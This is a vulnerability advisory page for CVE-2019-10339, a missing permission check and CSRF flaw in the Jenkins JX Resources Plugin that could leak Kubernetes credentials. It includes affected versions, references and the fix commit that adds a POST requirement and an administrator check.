Moderate severityNVD Advisory· Published Jun 11, 2019· Updated Aug 4, 2024

CVE-2019-10339

Description

Missing permission check in Jenkins JX Resources Plugin 1.0.36 and earlier allows users with Overall/Read to connect to an attacker-controlled Kubernetes server, potentially leaking credentials.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Missing permission check in Jenkins JX Resources Plugin 1.0.36 and earlier allows users with Overall/Read to connect to an attacker-controlled Kubernetes server, potentially leaking credentials.

A missing permission check in Jenkins JX Resources Plugin 1.0.36 and earlier allows users with Overall/Read access to invoke the GlobalPluginConfiguration#doValidateClient form validation method. This method did not verify the user's authorization before processing, enabling low-privileged users to initiate connections to arbitrary Kubernetes servers specified by an attacker [1][2].

To exploit this, an attacker needs only Overall/Read access to a Jenkins instance running an affected plugin version. The doValidateClient method also lacked a CSRF protection token, so a cross-site request forgery (CSRF) attack could be used to trigger the validation on behalf of a victim user [2]. By providing a malicious Kubernetes server URL and namespace, the attacker can cause Jenkins to connect to that server [1][2].

Successful exploitation can leak Kubernetes service account credentials used for the connection and expose arbitrary environment variables from the Jenkins controller process [2]. This could allow an attacker to obtain sensitive credentials and escalate privileges within the Jenkins environment or connected Kubernetes clusters [2].

The issue was fixed in JX Resources Plugin version 1.0.37, which adds proper permission checks (requiring Overall/Administer) and enforces POST requests to prevent CSRF [2][3][4]. Users should upgrade to the patched version immediately.

References

AI Insight generated on May 22, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected packages

Versions sourced from the GitHub Security Advisory.

Package	Affected versions	Patched versions
org.jenkins-ci.plugins:jx-resourcesMaven	< 1.0.37	1.0.37

Affected products

ghsa-coords
pkg:maven/org.jenkins-ci.plugins/jx-resources
Range: < 1.0.37
Jenkins project/Jenkins JX Resources Pluginv5
Range: 1.0.36 and earlier

Patches

f0d9fb76230b

[SECURITY-1379] Secure the GlobalPluginConfiguration.doValidateClient web method

https://github.com/jenkinsci/jx-resources-pluginJesse GlickJun 6, 2019via ghsa

commit

4 files changed · +17 −3

.mvn/extensions.xml+7 −0 added

@@ -0,0 +1,7 @@
+<extensions xmlns="http://maven.apache.org/EXTENSIONS/1.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/EXTENSIONS/1.0.0 http://maven.apache.org/xsd/core-extensions-1.0.0.xsd">
+  <extension>
+    <groupId>io.jenkins.tools.incrementals</groupId>
+    <artifactId>git-changelist-maven-extension</artifactId>
+    <version>1.0-beta-7</version>
+  </extension>
+</extensions>

.mvn/maven.config+2 −0 added

@@ -0,0 +1,2 @@
+-Pconsume-incrementals
+-Pmight-produce-incrementals

pom.xml+5 −3 modified

@@ -4,18 +4,20 @@
   <parent>
     <groupId>org.jenkins-ci.plugins</groupId>
     <artifactId>plugin</artifactId>
-    <version>3.37</version>
+    <version>3.43</version>
     <relativePath />
   </parent>
 
   <artifactId>jx-resources</artifactId>
-  <version>1.0.37-SNAPSHOT</version>
+  <version>${revision}${changelist}</version>
   <packaging>hpi</packaging>
   <name>JX Resources Plugin</name>
   <description>A plugin which uses Kubernetes Resources for storage of pipeline state</description>
   <url>https://wiki.jenkins.io/display/JENKINS/JX+Resources+Plugin</url>
 
   <properties>
+    <revision>1.0.37</revision>
+    <changelist>-SNAPSHOT</changelist>
     <jenkins.version>2.73.3</jenkins.version>
     <java.level>8</java.level>
     <kubernetes-client.version>3.1.10</kubernetes-client.version>
@@ -116,7 +118,7 @@
     <connection>scm:git:git://github.com/jenkinsci/jx-resources-plugin.git</connection>
     <developerConnection>scm:git:git@github.com:jenkinsci/jx-resources-plugin.git</developerConnection>
     <url>https://github.com/jenkinsci/jx-resources-plugin</url>
-    <tag>HEAD</tag>
+    <tag>${scmTag}</tag>
   </scm>
 
   <repositories>

src/main/java/org/jenkinsci/plugins/jx/resources/GlobalPluginConfiguration.java+3 −0 modified

@@ -18,6 +18,7 @@
 
 import static org.jenkinsci.plugins.jx.resources.KubernetesUtils.getNamespaceOrUseDefault;
 import org.kohsuke.stapler.QueryParameter;
+import org.kohsuke.stapler.interceptor.RequirePOST;
 
 @Extension
 public class GlobalPluginConfiguration extends GlobalConfiguration {
@@ -126,7 +127,9 @@ protected void doRun() throws Exception {
         }
     }
 
+    @RequirePOST
     public FormValidation doValidateClient(@QueryParameter String server, @QueryParameter String namespace) {
+        Jenkins.getInstance().checkPermission(Jenkins.ADMINISTER);
         try {
             KubernetesUtils.shutdownKubernetesClient();
             KubernetesClient kubeClient = KubernetesUtils.getKubernetesClient(server, this);

Vulnerability mechanics

Generated on May 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

github.com/advisories/GHSA-xqqr-mq8x-22qxghsaADVISORY
nvd.nist.gov/vuln/detail/CVE-2019-10339ghsaADVISORY
www.openwall.com/lists/oss-security/2019/06/11/1ghsamailing-listx_refsource_MLISTWEB
www.securityfocus.com/bid/108747mitrevdb-entryx_refsource_BID
github.com/jenkinsci/jx-resources-plugin/commit/f0d9fb76230b65e851095da936a439d953c5f64dghsaWEB
jenkins.io/security/advisory/2019-06-11/ghsax_refsource_CONFIRMWEB
web.archive.org/web/20200227033720/http://www.securityfocus.com/bid/108747ghsaWEB

News mentions

No linked articles in our index yet.

cvss	0.260
epss	0.000
exploit	0.000
kev	0.000
patch	-0.070
ransomware	0.000